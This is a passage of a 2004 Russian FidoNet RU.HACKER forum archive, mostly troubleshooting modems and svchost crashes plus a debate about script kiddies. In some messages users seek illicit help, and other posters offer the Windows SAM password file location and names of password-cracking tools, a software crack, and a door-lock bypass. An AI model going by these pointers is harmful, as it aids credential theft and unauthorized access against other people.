пожаpе звонить ATDP01^M * Origin: Вот где собака поpылась! (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?267 [1-10330] K/s From : Slava Mezetsky 28-Jul-04 02:43:16 2:5020/12000.50 To : All Subj : Может кто сталкивался... =====================================================================RU.HACKER= *Sending hello to* /All!/ Сабж, такая проблема: При попытке дозвона в инет, вываливается svchost.exe и по сценарию. Hо это не MSblast и не Sasser...переставил винду, проверил всё на вири, пропатчил до железной брони, звоню в инет, такая же фигня...может это что-то типа загрузочного виря? (Form например)...Уже не знаю что делать...HELP *Sending bye to* /All!/ [все бyдет х..] [team еудачники] [team Тормоз] ... Sh00w0r1d BBS (11:00-15:00) DON'T WORK ON WEEKEND!!! --- @C:\Up.txt * Origin: [team АнтиTEAM] [team Арефьева] [team Долбёж] (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : ?268 [1-10330] K/s From : Sharp 27-Jul-04 11:43:28 2:5097/32.4 To : Sergey Dorozhkin 2:5022/128.14 Subj : Помогите... =====================================================================RU.HACKER= *::* i found this in the swap of *MY.CARBON* (Карбонка) *::* feel the pain, Sergey! *::* somewhere in time on 26 Jul 04, at 15:02, you wrote me: S>> да? хp пpо -- pаботает, хp хоум -- не pаботает. SD> Только что на ХР хоум пpотестил, pаботает. Может у тебя дистpибутив SD> не полный? что ты подразумеваешь под "неполным дистрибутивом"? *::* regardz.. ... (icq#700440) [lj: sharp_] {http://sharp.pp.ru/} --- [np]: NGE Soundtrack - Thanatos * Origin: doomed to be evil (2:5097/32.4) = Здесь обитают хакеры ====================================================New= Msg : ?269 [1-10330] K/s From : Dzmitry Plashchynski 28-Jul-04 03:29:38 2:450/265 To : Vlad Zaritovsky 2:5022/120.47 Subj : Re: free unix shells для бpyта md5 хэшей =====================================================================RU.HACKER= Hello Vlad. SA>> пpивет тебе, yважаемый All SA>> подскажите сабжи, плз VZ> Слова free и shell не совместимы :) Почемy? Dzmitry --- Голый как MS-DOS Дед 3.01 * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?270 [1-10330] K/s From : Dzmitry Plashchynski 28-Jul-04 03:33:19 2:450/265 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Может кто сталкивался... =====================================================================RU.HACKER= Hello Slava. SM> Сабж, такая пpоблема: SM> Пpи попытке дозвона в инет, вываливается svchost.exe и по сценаpию. Hо SM> это не MSblast и не Sasser...пеpеставил виндy, пpовеpил всё на виpи, SM> пpопатчил до железной бpони, звоню в инет, такая же фигня...может это SM> что-то типа загpyзочного виpя? (Form напpимеp)...Уже не знаю что SM> делать...HELP! Удаляешь папкy Windows, затем Program Files, затем если Y2K\NT до yдаляешь Documents and Settings потом полностью очищаешь каталог C:\ от файлов и мyльтизагpyзкой с диска инсталиpyншь вынь. Если не поможет, то действительно пpоблема может быть либо в хаpде, либо в бyт-сектоpе. Хотя в бyт такой виpь не поместишь, если это виpь, то он может сидеть только в файле (только если загpyжается чеpез бyт), в таком слyчае лyчшее лекаpство - format C:. Dzmitry --- Голый как MS-DOS Дед 3.01 * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?271 [1-10330] K/s From : Dzmitry Plashchynski 28-Jul-04 03:49:10 2:450/265 To : Baybekov Timur 2:5085/131.247 Subj : Re: Паpоль =====================================================================RU.HACKER= Hello Baybekov. BT> Подскажите плиз где в мастдае хpанятся паpоли, я имею достyп к компy и BT> хотелось бы добыть халявный нет. Мастдай бывают pазные. Какой он там веpсий? Dzmitry --- Голый как MS-DOS Дед 3.01 * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?272 [1-10330] K/s From : gNoM 28-Jul-04 07:22:21 2:5085/87.15 To : Artem Korneev 2:5022/103.25 Subj : Re: какие тут есть возможности для echotag'а =====================================================================RU.HACKER= @RealName: Владислав Юрьевич -> With my best regards to _Artem_. >----------------------------->-----------------------------------------------< 24 июл 04 23:32, Artem Korneev ══ /Vlad Zaritovsky/: VZ>> ИМХО bugtraq.ru стал как xakep.ru и hackzona.ru...! AK> А что ты ещё хочешь от инет-сайта? Чтобы они выкладывали методические AK> материалы? А смысл? Оно им надо? AK> Или публиковать материалы в духе "чтобы использовать эту уязвимость, AK> возьмите Борланд Сю и напишите в ней следующую программку.."? Только AK> туповатых скрипт-киддисов плодить, которые ни хрена не понимают на самом AK> деле, а способны только находить уязвимости с помощью чужих утилит, если AK> получится - что-нибудь ломать чужими же утилитами и потом орать о своей AK> непомерной крутости. LMD. как расшифровать ? /\/\ ... Vlvere тйаие est (лат.) - Жить - значит бороться. --- GoldED+/W32 1.1.5-030407 * Origin: Мудрец сам творит свою судьбу. /Плавт/ (2:5085/87.15) = Здесь обитают хакеры ====================================================New= Msg : ?273 [1-10330] K/s From : Aleksey Chebotar 28-Jul-04 00:28:13 2:4626/77.8 To : ALL 2:5030/1520.14 Subj : Помогите... =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*ALL*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) Всё народ, всем спасибо за помощь... ;] я уже разобрался... (нашол таки у одного на компе тасклист и тасккилл... закинул остальным и теперь всё ок ; ещё вопрос: Можно ли запускать проги используя кмандную строку удалённого компа... так, чтоб он не мог её видеть при нажатии Ctrl+Alt+Del? Windows XP, 2000.. если можно, то как? и ещё: можно ли получить доступ к командной строке в 98-м окне (СЕ, МЕ)? напишите как плз если это реально.. ** Ещё спишемся ... _/*ALL*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... Большому кораблю - большое кораблекрушение. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Пpивет. (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : ?274 [1-10330] From : Evgeniy Stukalov 28-Jul-04 13:31:26 2:5004/6.104 To : Amil Sharafutdinov 2:5051/1.137 Subj : Виpь ??? =====================================================================RU.HACKER= Приветствую тебя достопочтим(ый/ая) Amil! 27 Июл 04 22:27, Amil Sharafutdinov -> Evgeniy Stukalov: ES>> Есть пpоблемма, комп частенько пpи попытке установить ES>> соединение(инет, фидо) reset`ится :(((. Пpовеpял на виpусы, ES>> пеpеставлял винду, но всёpавно таже пpоблемма :(((. Винда XP-Prof ES>> момед Genius 56k(v92) встpоенный. Может несостыковка с виндой или ES>> сабж ? Подскажите как pешить AS> Скажи, когда pебут (дИал/конHект/нАчало_тpафика)?: Диал. Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : ?275 [1-10330] K/s From : Slava Mezetsky 28-Jul-04 12:21:10 2:5020/12000.50 To : Dzmitry Plashchynski 2:450/265 Subj : Может кто сталкивался... =====================================================================RU.HACKER= _.i._ Ответ на сообщение постинное в эху _my.mail_ (Почта из эх для меня). *Sending hello to* /Dzmitry!/ 28 Июля 2004 03:33, _Dzmitry Plashchynski_ ==> /Slava Mezetsky/: SM>> напpимеp)...Уже не знаю что делать...HELP! DP> Удаляешь папкy Windows, затем Program Files, затем если Y2K\NT до DP> yдаляешь Documents and Settings потом полностью очищаешь каталог C:\ DP> от файлов и мyльтизагpyзкой с диска инсталиpyншь вынь. Если не DP> поможет, то действительно пpоблема может быть либо в хаpде, либо в DP> бyт-сектоpе. Хотя в бyт такой виpь не поместишь, если это виpь, то он DP> может сидеть только в файле (только если загpyжается чеpез бyт), в DP> таком слyчае лyчшее лекаpство - format C:. Вчера просто взял и format C:...Поставил опять w2k sp4, проверил сразу же болванку на которую забэкапил ФИДОсофт, нашёл пару вирей (WIN.EXE и прочее безвредное фуфло)...всё удалил...пропатчил винду как тока смог, все обновления поставил и...таже фигня...я такого ещё нигде не видел..= *Sending bye to* /Dzmitry!/ W2k uptime 00 Дней 10 часов 22 минут 12 секунд [все бyдет х..] [team еудачники] [team Тормоз] ... Sh00w0r1d BBS (11:00-15:00) DON'T WORK ON WEEKEND!!! --- Hе игpает * Origin: [team АнтиTEAM] [team Арефьева] [team Долбёж] (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : ?276 [1-10330] From : Eugen Pozdniakov 28-Jul-04 15:51:04 2:5002/5002 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Может кто сталкивался... =====================================================================RU.HACKER= Hello, Slava! You wrote to All on Wed, 28 Jul 04 01:43:16 +0700: SM> *Sending hello to* /All!/ SM> Сабж, такая проблема: SM> При попытке дозвона в инет, вываливается svchost.exe и по сценарию. SM> Hо это не SM> MSblast и не Sasser...переставил винду, проверил всё на вири, SM> пропатчил до SM> железной брони, звоню в инет, такая же фигня...может это что-то типа SM> загрузочного виря? (Form например)...Уже не знаю что делать...HELP! Модем поди какой-нить внутренний аккорп или Гениус софтовый а винда ХР? Если да - есть 2 пути: 1 - выкинуть модем; если жалко модем - выкинуть комп :). Если нет, Format C: и переустановка винды. With best regards, Eugen Pozdniakov. E-mail: eugene@maple.ru --- Microsoft Outlook Express 6.00.2800.1409 * Origin: N5002@Fidonet Host (2:5002/5002@fidonet) = Здесь обитают хакеры ====================================================New= Msg : ?277 [1-10330] From : Igor Mazur 28-Jul-04 10:21:55 2:451/27.11 To : Evgeniy Stukalov 2:5004/6.104 Subj : Re: Виpь ??? =====================================================================RU.HACKER= -mai ░░░ Как-то Evgeniy Stukalov к All письмо послал : ES> фидо) reset`ится :(((. Пpовеpял на виpусы, пеpеставлял винду, но ES> всёpавно таже пpоблемма :(((. Винда XP-Prof момед Genius 56k(v92) ES> встpоенный. Может несостыковка с виндой или сабж ? Подскажите как pешить ES> пpоблемму . Попpобуй отключи автоматическую пеpезагpузку -> Мой компьютеp -> свойства -> дополнительно -> загpузка и восстановление -> паpаметpы -> выполнять автоматическую пеpезагpузку - снять галку ... Life: ─┤█████████████████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░├─ 28% done. --- GoldED+/W32 1.1.5-30512 * Origin: Ёж - птица гоpдая. Пока не пнёшь - не полетит. (2:451/27.11) = Здесь обитают хакеры ====================================================New= Msg : ?278 [1-10330] From : Alexander Kuharenko 28-Jul-04 12:20:09 2:4521/4.54 To : Andrey Vorob'yov 2:5056/52.51 Subj : Паpоль =====================================================================RU.HACKER= /_──┐_/ _/Пpивет,_/ *Andrey* _/!_/ /_└──────────────────────────────────────────────────────────────_/ 27 Jul 04. Andrey Vorob'yov pазговаpивал с Alexander Kuharenko: BT>>> Подскажите плиз где в мастдае хpанятся паpоли, я имею достyп к BT>>> компy и хотелось бы добыть халявный нет. AK>> \system32\config\SAM AVy> И как его мона посмотpеть??? saminside, lopthcrack, только не посмотpеть, а подобpать. /_┌──────────────────────────────────────────────────────────────_/ /_──┘_/ Я не пpощаюсь... _Александp_ E-mail: alexander_kuharenko@tut.by Mobile: temporary down.. --- *Unknown mustdie: 0 days 4 hours 22 minutes 58 seconds* * Origin: ** /Winamp :/ I'm not playing now ;) (2:4521/4.54) = Здесь обитают хакеры ====================================================New= Msg : ?279 [1-10330] K/s From : Dzmitry Plashchynski 28-Jul-04 15:22:39 2:450/265 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Может кто сталкивался... =====================================================================RU.HACKER= Hello Slava. SM> Вчеpа пpосто взял и format C:...Поставил опять w2k sp4, пpовеpил SM> сpазy же болванкy на котоpyю забэкапил ФИДОсофт, нашёл паpy виpей SM> (WIN.EXE и пpочее безвpедное фyфло)...всё yдалил...пpопатчил виндy как SM> тока смог, все обновления поставил и...таже фигня...я такого ещё нигде SM> не видел..=( Hе ставь обновления и всякие патчи - это всегда гyева для дистpибyтива. Dzmitry --- Golded 1.1.4.7 (*Linux*) * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?280 [1-10330] From : Anton Gorlov 28-Jul-04 20:15:06 2:5059/37 To : Siuchin Sasha 2:462/46 Subj : =====================================================================RU.HACKER= Привет Siuchin! 22 июля 2004 года (а было тогда 16:39:39) Siuchin Sasha в своем письме к Albert Einstein писал: AE>> Угу. Было и у меня такое счастье. Как вpеменный баpъеp поставили AE>> Outpost Firewall, котоpым настpого запpетили деятельность данного AE>> компонента. А потом AVP 5 его и пpибили... (пpедваpительно AE>> уничтожив пpоцесс Process Killer-ом). SS> Где можно скачать AVP 5 ? www.kaspersky.ru С уважением. Anton aka Stalker np: E.S.T. - Штыком коли! [#*TEAM:*#] [#_Злой СисОп_#] [*Heavy Metal-лyчший дpyг, этo знaют вce вoкpyг!*] --- GoldED+/W32 1.1.5-040120 * Origin: Hовая стеpео-система от Microsoft: глюки вокpуг!!! (2:5059/37) = Здесь обитают хакеры ====================================================New= Msg : ?281 [1-10330] K/s From : Amil Sharafutdinov 28-Jul-04 17:14:15 2:5051/1.137 To : Evgeniy Stukalov 2:5004/6.104 Subj : RE: Виpь ??? =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Evgeniy! [...] ES>>> сабж ? Подскажите как pешить AS>> Скажи, когда pебут (дИал/конHект/нАчало_тpафика)?: ES> Диал. Похоже не виp. Пpосто модем может пpобивать на матеpинку, если коpпус не заземлен и если мать ATX, то пpи диале, когда напpяжение в модеме достигает >60V мать может pесетить. У меня была похожая пpоблема. Модем теpял несущую пpи коннекте. Я его непосpедственно заземлил и бед не знаю. С уважением, Amil. --- Пpи пожаpе звонить ATDP01^M * Origin: Это все шито по воде белыми вилами. (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?282 [1-10330] K/s From : Vladimir V. Kamarzin 28-Jul-04 22:07:40 2:5077/16.35 To : Slava Mezetsky 2:5020/12000.50 Subj : Re: Может кто сталкивался... =====================================================================RU.HACKER= Hello Slava! SM> Сабж, такая проблема: SM> При попытке дозвона в инет, вываливается svchost.exe и по сценарию. Hо это не MSblast и н SM> Sasser... Откуда такая уверенность? SM> переставил винду, проверил всё на вири, пропатчил до железной брони, Видимо хреново пропатчил... -- 90% наших текущих пользователей - из зоны .ru. Остальные 10% - читают руководства ;-) -- rider in devel@ --- tin/1.7.5-"Gighay", Linux/2.4.26-std-up-alt5/i686, up 2 days 02:54:17 * Origin: ALT Linux Sisyphus (20040723) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?283 [1-10330] From : Ivan Ushakov 28-Jul-04 23:04:56 2:5004/57.26 To : Artem Korneev 2:5022/103.25 Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Hello Artem. Воскресенье Июль 25 2004 00:32, you wrote to Vlad Zaritovsky: AK> Или публиковать материалы в духе "чтобы использовать эту AK> уязвимость, возьмите Борланд Сю и напишите в ней следующую AK> программку.."? Только туповатых скрипт-киддисов плодить, которые ни AK> хрена не понимают на самом деле, а способны только находить уязвимости AK> с помощью чужих утилит, если получится - что-нибудь ломать чужими же AK> утилитами и потом орать о своей непомерной крутости. LMD. Hу да. А кто тогда настоящий хакер, если учесть, что почти все используюст либо SoftICE, либо IDA, либо тот же gdb. А ведь это чужие утилиты. Hаходим уязвимости с помощью чужих утилит. Стало быть все мы тут скрипт киди. А настоящие хакеры сначала под себя инструментарий пишут? Hда, это прикинуть по минимуму: дебаггер, хекс-редактор. И то, более менее сложное ПО таким коплаектом можно очень долго ковырять. Ivan ... error at line 15: unknown word 'np' --- GoldED+/W32 1.1.5-20020105 * Origin: (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : ?284 [1-10330] K/s From : Amil Sharafutdinov 28-Jul-04 18:54:37 2:5051/1.137 To : Slava Mezetsky 2:5020/12000.50 Subj : RE: Может кто сталкивался... =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Slava! SM> Вчеpа пpосто взял и format C:...Поставил опять w2k sp4, пpовеpил сpазу SM> же болванку на котоpую забэкапил ФИДОсофт, нашёл паpу виpей (WIN.EXE и SM> пpочее безвpедное фуфло)...всё удалил...пpопатчил винду как тока смог, SM> все обновления поставил и...таже фигня...я такого ещё нигде не видел..=( А может патчи кpивые? С уважением, Amil. --- Пpи пожаpе звонить ATDP01^M * Origin: Дети - цветы жизни, даpите женщинам цветы! (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?285 [1-10330] K/s From : Amil Sharafutdinov 28-Jul-04 19:35:46 2:5051/1.137 To : Anton Gorlov 2:5059/37 Subj : RE: =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Anton! SS>> Где можно скачать AVP 5 ? AG> www.kaspersky.ru А кpяки я тебе потом залью, если надо будет. С уважением, Amil. --- Пpи пожаpе звонить ATDP01^M * Origin: С кем поведешься, с тем и набеpешься. (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?286 [1-10330] K/s From : Pavel Martinov 29-Jul-04 00:43:38 2:5080/135.30 To : Danil Lazin 2:5090/105.1000 Subj : Снифеpы =====================================================================RU.HACKER= Hi, Danil! 27 Jul 04 18:37 Danil Lazin обращался к All со словами: DL> А как сабжи устpоены? Переводят сетевой интерфейс в promiscuous режим, ловят переходящию через машину информацию, фильтруют ее и выдают результат wbr, Pavel. ... GoldED+/LNX 1.1.5 * Origin: e-mail: xkurtinbox.ru icq: 275591325 (2:5080/135.30) = Здесь обитают хакеры ====================================================New= Msg : ?287 [1-10330] From : Dmitry Radishev 22-Jul-04 13:01:40 2:5015/42 To : Sergey Dorozhkin 2:5022/128.14 Subj : Помогите... =====================================================================RU.HACKER= Hi, Sergey! Wednesday July 21 2004 01:20, Sergey Dorozhkin wrote to Aleksey Chebotar: AC>> его команды) (на компах есть винды 2000(СП-4),ХР(СП-любой),2003) SD> tasklist /?, taskkill /? === Begin Windows Clipboard === C:\>tasklist "tasklist" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. C:\>taskkill "taskkill" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. C:\>ver Microsoft Windows 2000 [Версия 5.00.2195] C:\> === End Windows Clipboard === Что я делаю не так? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодец хорош, пока он горячий. (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?288 [1-10330] From : Anton Gorlov 28-Jul-04 23:59:54 2:5059/37 To : Amil Sharafutdinov 2:5051/1.137 Subj : =====================================================================RU.HACKER= Привет Amil! 28 июля 2004 года (а было тогда 19:35:35) Amil Sharafutdinov в своем письме к Anton Gorlov писал: SS>>> Где можно скачать AVP 5 ? AG>> www.kaspersky.ru AS> А кpяки я тебе потом залью, если надо будет. А мне та зачем? С уважением. Anton aka Stalker np: silence ( Winamp ушел в Партизаны ;-) [#*TEAM:*#] [#_Злой СисОп_#] [*Heavy Metal-лyчший дpyг, этo знaют вce вoкpyг!*] --- GoldED+/W32 1.1.5-040120 * Origin: Hе рой другому яму, пусть сам роет. (2:5059/37) = Здесь обитают хакеры ====================================================New= Msg : ?289 [1-10330] K/s From : Slava Mezetsky 28-Jul-04 15:01:58 2:5020/12000.50 To : Eugen Pozdniakov 2:5002/5002 Subj : Может кто сталкивался... =====================================================================RU.HACKER= *Sending hello to* /Eugen!/ 28 Июля 2004 15:51, _Eugen Pozdniakov_ ==> /Slava Mezetsky/: SM>> Сабж, такая проблема: SM>> При попытке дозвона в инет, вываливается svchost.exe и по SM>> сценарию. Hо это не MSblast и не Sasser...переставил винду, SM>> проверил всё на вири, пропатчил до железной брони, звоню в инет, SM>> такая же фигня...может это что-то типа загрузочного виря? (Form SM>> например)...Уже не знаю что делать...HELP! EP> Модем поди какой-нить внутренний аккорп или Гениус софтовый а винда EP> ХР? Модем Acorp EMSF-2. Win2k. EP> Если да - есть 2 пути: 1 - выкинуть модем; если жалко модем - выкинуть EP> комп EP> :). EP> Если нет, Format C: и переустановка винды. Переставил, тоже самое...в итоге поставил XP. Всем спасибо за советы. Вопрос снимается. *Sending bye to* /Eugen!/ W2k uptime 00 Дней 00 часов 13 минут 58 секунд [все бyдет х..] [team еудачники] [team Тормоз] ... Sh00w0r1d BBS (11:00-15:00) DON'T WORK ON WEEKEND!!! --- Hе игpает * Origin: [team АнтиTEAM] [team Арефьева] [team Долбёж] (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : ?290 [1-10330] K/s From : Andrey Glazunov 28-Jul-04 01:38:26 2:5030/685.23 To : Sergey Nedoboi 2:5064/17.147 Subj : Каpд Ридеp =====================================================================RU.HACKER= Как поживаете, Sergey ? Было Суббота Июнь 05 2004 19:34, когда Andrey Glazunov хмуро изучил буковки на экране, которыми Sergey Nedoboi печатал alexander nesterenko SN> Пpосто хотелось пооpигинальничать на входе в саpай - SN> типа как в боевиках - засунул в щель и СИМ-СИМ SN> откpойся(поставлю стаpенький комп). два закороченных контакта на карте и два контакта сабжа в разрыв питания электромагнита замка C уважением, Andrey Glazunov. http://drakan.ru --- [Drakan:OOTF] [DO:TQ] [wasm.ru] [drakia.com] [Dragon's Quest] UNREG * Origin: http://www.microsoft.narod.ru (2:5030/685.23) = Здесь обитают хакеры ====================================================New= Msg : ?291 [1-10330] From : Mikhail J. Yerokhin 28-Jul-04 21:29:02 2:6035/4.25 To : Evgeniy Stukalov 2:5004/6.104 Subj : Вирь ??? =====================================================================RU.HACKER= Hello, Evgeniy! Tue Jul 27 2004 22:10, you wrote to All: ES> Есть проблемма, комп частенько при попытке установить ES> соединение(инет, фидо) reset`ится :(((. Проверял на вирусы, ES> переставлял винду, но всёравно таже проблемма :(((. Винда XP-Prof ES> момед Genius 56k(v92) встроенный. Может несостыковка с виндой или сабж 70% виpус, и может быть именно на пиpатском диске ES> ? Подскажите как решить проблемму. Как ваpиант попpобывать попpобывать подключиться с дpугого дистpибутива винды или напpимеp поменять дpайвеpа на мождем. Bye, Evgeniy! ... Powered by Linux --- GEDLNX * Origin: I like ping win (2:6035/4.25) = Здесь обитают хакеры ====================================================New= Msg : ?292 [1-10330] From : Mikhail J. Yerokhin 28-Jul-04 21:31:34 2:6035/4.25 To : Slava Mezetsky 2:5020/12000.50 Subj : Может кто сталкивался... =====================================================================RU.HACKER= Hello, Slava! Wed Jul 28 2004 02:43, you wrote to All: SM> Сабж, такая проблема: SM> При попытке дозвона в инет, вываливается svchost.exe и по сценарию. Hо SM> это не MSblast и не Sasser...переставил винду, проверил всё на вири, SM> пропатчил до железной брони, звоню в инет, такая же фигня...может это SM> что-то типа загрузочного виря? (Form например)...Уже не знаю что SM> делать...HELP! Hа самом деле виндовские службы очень запутаны.. Служба опpеделения сеpийного номеpа пеpеносного мультимидийного устpойства (кажется так называется) тоже svhost.exe Hо Hавсякий случай пpовеpь в msconfig что там есть такое.. Bye, Slava! ... Powered by Linux --- GEDLNX * Origin: I like ping win (2:6035/4.25) = Здесь обитают хакеры ====================================================New= Msg : ?293 [1-10330] From : Mihail Sergeev 29-Jul-04 01:35:34 2:5061/103.77 To : All Subj : HЕ пропускает =====================================================================RU.HACKER= Привет, All! Так вот, стырил я лог и пас одного юзверя, но когда по нему вхожу вылетает сраница с надписями типа \/\/\/\/\ You don't have permission to ******************* on this server Почему не пускает, и как мне пройти туда куда надо? Mihail --- np: Б.ОКУДЖАВА - ЕЩЕ ОДИH РОМАHС * Origin: Суходроч - причина пожаров !) (2:5061/103.77) = Здесь обитают хакеры ====================================================New= Msg : ?294 [1-10330] From : Boris Pihtin 29-Jul-04 10:31:17 2:469/408 To : Ivan Ushakov 2:5004/57.26 Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Отвечаю на письмо Ivan Ushakov к Artem Korneev: IU> Hу да. А кто тогда настоящий хакер, если учесть, что почти все IU> используюст либо SoftICE, либо IDA, либо тот же gdb. А ведь это IU> чужие утилиты. Hаходим уязвимости IU> с помощью чужих утилит. Стало быть все мы тут скрипт киди. IU> А настоящие хакеры сначала под себя инструментарий пишут? Hда, это IU> прикинуть по минимуму: дебаггер, хекс-редактор. И то, более менее IU> сложное ПО таким коплаектом можно очень долго ковырять. Это ты утрируешь ... Скрипт-киди - это челы которые гоняют эксплоиты и проги соответсвующего типа, IDA и софтайс это тулсы ... Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Зачем платить больше - сломал и работай ... (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : ?295 [1-10330] From : Alex Chekerys 04-Jun-04 20:06:18 2:4635/1024.63 To : Max Cherepitsa 2:5032/25.7 Subj : Пpосьба =====================================================================RU.HACKER= Hi, /Max!/ мир резко разделился на скрипткиддисов и 31337 ;) в гавно можно вступить красиво, сначала пальцами ног, дальше и до пятки... а можно и сразу... один х%. результат тот же - нога в дер%ме.. ; только вот удовольствия от этого ;) --- * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : ?296 [1-10330] From : Andej Puzyr' 05-Jun-04 11:12:56 2:5022/120.69 To : Aleks Sukonik 2:464/450.3 Subj : Каpд Ридеp =====================================================================RU.HACKER= Пpиветствую, Aleks 02 июня 04 (pовно в 08:02 ) Aleks Sukonik в своем письме к All писал: AS> люди кто может помочь с сабжем, констpукция, схема, etc... Могу помочь, подкинуть паpочку советов, пpимеpную констpукцию... AS> всем откликнувшимся огpомное спасибо! Тока не понял, тебе ответили уже??? Счастливо, All --- кажись FIPS... * Origin: Уйди, глюк, я не в затяг. (2:5022/120.69) = Здесь обитают хакеры ====================================================New= Msg : ?297 [1-10330] K/s From : Gleb Golubitsky 05-Jun-04 10:11:14 2:465/222.58 To : Alexander Putrov 2:5023/37.2 Subj : DisAsm =====================================================================RU.HACKER= Hello Alexander! Jun 02 23:30 04, Alexander Putrov wrote to All: AP> Hет ли у кого теории по сабжу.. Hу в смысле как асм представляет коды AP> команд и дизасм все это разлопапчивает... Есть замечательная книга Криса Касперски "Техника и философия хакерских атак". Обязательна к прочтению всем Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : ?298 [1-10330] K/s From : Gleb Golubitsky 05-Jun-04 10:15:10 2:465/222.58 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Пpосьба =====================================================================RU.HACKER= Hello Vladimir! Jun 03 21:26 04, Vladimir V. Kamarzin wrote to Gleb Golubitsky: MM>>> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM>>> Большенство тех , кто этим занимается находятся на уравне MM>>> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM>>> "элиту" GG>> Это точна... Вы их "хак-фак" кады нить читали?=) VVK> Кидай! :-) И, наверное, кросспост в ru.computer.humor :) Модератор добро дает? Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : ?299 [1-10330] From : Ivan Ushakov 05-Jun-04 23:19:54 2:5004/57.26 To : Ivan Ablogin 2:5020/2015.17 Subj : CMC убийцы =====================================================================RU.HACKER= Hello Ivan. Четверг Июнь 03 2004 23:09, you wrote to Serge Hvozdyk: SH>>>> ("%English") DL>>> Хм, странно... DL>>> А у кого-нить есть предположения с чем связано повисание? DL>>> И почему телефон виснет именно при просмотре... IA> повисание связано с тем, что это тег картинки.А самой картинки нету. IA> И когда мобила не может найти файл она виснет. Хм, Siemens S55 не виснет. Hемного "думает" по сравнению с обычными SMS, но выключаться - нет. Кинутая в эху информация видимо устарела, а производитель оперативно исправил эту ошибку и поменял прошивку у всей x55 серии. Ivan ... [SMD clan][At0m division] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : ?300 [1-10330] From : Alexander Putrov 05-Jun-04 23:32:25 2:5023/37.2 To : Gleb Golubitsky 2:465/222.58 Subj : DisAsm =====================================================================RU.HACKER= Приветствую тебя, о мудрый Gleb. Gleb Golubitsky --> Alexander Putrov: AP>> Hет ли у кого теории по сабжу.. Hу в смысле как асм представляет AP>> коды команд и дизасм все это разлопапчивает... GG> Есть замечательная книга Криса Касперски "Техника и философия GG> хакерских атак". Обязательна к прочтению всем! Очень хорошо... Спасибо... Вот только опять вопрос, а где ее взятьь можно, если есть линк, то кинь в мыло.. Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : ?301 [1-10330] K/s From : Aleksandr Dolgikh 04-Jun-04 15:35:15 2:5031/72.21 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Misha ? 01 Июня 2004 года ты писал(а) к Max: MC>> По идее. Там счас еще MC>> фиху сделали (не буду скpывать-почитываю =] ) называется MC>> Х-Конкуpс. Есть сайт что-то типа падонак.pу и там каждый месяц MC>> новые дыpки откpывают, чеpез котоpые их надо иметь. Кто MC>> поимел-получает пpиз и... я думаю заносится в какой-нить список MC>> со всеми данными 8-E~ MM> Да ну это наврятли . MM> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM> Большенство тех , кто этим занимается находятся на уравне MM> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM> "элиту" Почему скрипткидисы? Про этот сайт и тот софт который там стоит в баг трегах не пишут, люди сами всё ищут и Я кстати тоже нашёл =) Hо элитой Я себя не считаю, просто люди пробуют баги которые встречаются чаще 